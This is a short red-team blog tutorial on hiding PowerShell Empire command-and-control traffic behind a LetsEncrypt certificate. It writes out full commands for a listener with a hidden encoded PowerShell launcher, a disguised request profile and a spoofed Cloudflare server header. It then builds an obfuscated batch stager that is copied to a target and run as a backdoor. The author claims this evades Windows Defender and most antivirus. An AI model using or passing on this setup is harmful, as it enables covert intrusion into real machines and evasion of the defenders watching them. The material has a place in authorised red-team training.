RED TEAM TUTORIALS — №2

Encrypting Empire traffic

3 min readMay 30, 2021

Photo by Markus Winkler via Unsplash.com

TOPICS

Register a domain
Letsencrypt
Empire Magic

GO THE EXTRA MILE

Stop being lazy. Stop using the default options that come with your favourite hacking tools. To avoid detection, you need play smart. Because believe it or not, Hunters (or: Blue Teamers) are becoming smarter every day.

In this tutorial, I will not only focus on the (proper) use of SSL but I will also show you some of the options that need changing to avoid detection. The options I set are in no way conclusive, but merely a way to show you that the defaults are easily fingerprintable. So, go the extra mile!

I trust that you know how to set up an Empire listener by now. If this is new to you, follow this tutorial first to get familiar with PowerShell Empire.

1. Register a domain

First, register a domain for your C2 server or create a subdomain on an existing domain. This is not only a mandatory step for a valid SSL certificate, but it also allows you to move your C2 infrastructure to another hosting company or IP address. With just one DNS update, all of your backdoors will be able to find your C2 server.

2. Use LetsEncrypt to create an SSL certificate

To avoid detection because of fingerprintable SSL certificates, you should create your own custom SSL certificates. Luckily, that’s where LetsEncrypt comes in. A nonprofit Certificate Authority providing TLS certificates to 260 million websites for free (!).

Go to certbot.eff.org
For software, choose None of the above
For system, choose your OS. In my case: Ubuntu 20.04
Follow the instructions to install Certbot on your C2 server
Then, request a certificate using the --standalone option:
# certbot certonly --standalone -d YOURDOMAINHERE
If everything went okay, your certificate should be in this directory: /etc/letsencrypt/live/YOURDOMAINHERE

To make this brand new certificate ready for Empire, follow these few easy steps:

Create a directory to save the new certificate in:
# mkdir /opt/ssl
Symlink LetsEncrypt's fullchain to the new directory, but using the naming convention of Empire:
# ln -s /etc/letsencrypt/live/YOURDOMAINHERE/fullchain.pem /opt/ssl/empire-chain.pem
Symlink LetsEncrypt's privkey to the new directory, again using the naming convention of Empire:
# ln -s /etc/letsencrypt/live/YOURDOMAINHERE/privkey.pem /opt/ssl/empire-priv.key

SIDENOTE

You could increase your OpSec by using Cloudflare instead of LetsEncrypt. The downside is that you can only use WEB ports for your C2 connections because Cloudflare only forwards WEB traffic to your IP address.

3. Empire Magic

No issues so far? Good! Let's continue…

Using a proper SSL certificate is not the only thing you’ll need to evade the Hunters. Below, you’ll see me change some default options to limit the risk of any detection rules going off. Start Empire and issue the following commands:

listeners
uselistener http
set Name http
set Host https://YOURDOMAINHERE:443
set Port 443
set Launcher powershell.exe -nop -w hidden -e
set DefaultProfile /wp_includes/microsoft.php|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36|Accept:*/*
set CertPath /opt/ssl/
set Headers Server:cloudflare
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
execute

After that, set up the stager:

listeners
usestager windows/launcher_bat
set Listener http
set Obfuscate True
set ObfuscateCommand Token\String\1,1,2,1, Token\Variable\1
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
set AMSIBypass False
execute

If you set option OutFile, the output will be in the filename mentioned (default: /tmp/launcher.bat). Just copy the file (or the contents) to your target and double click to launch your backdoor.

That’s it! This should have evaded Windows Defender and most antivirus software. Good job!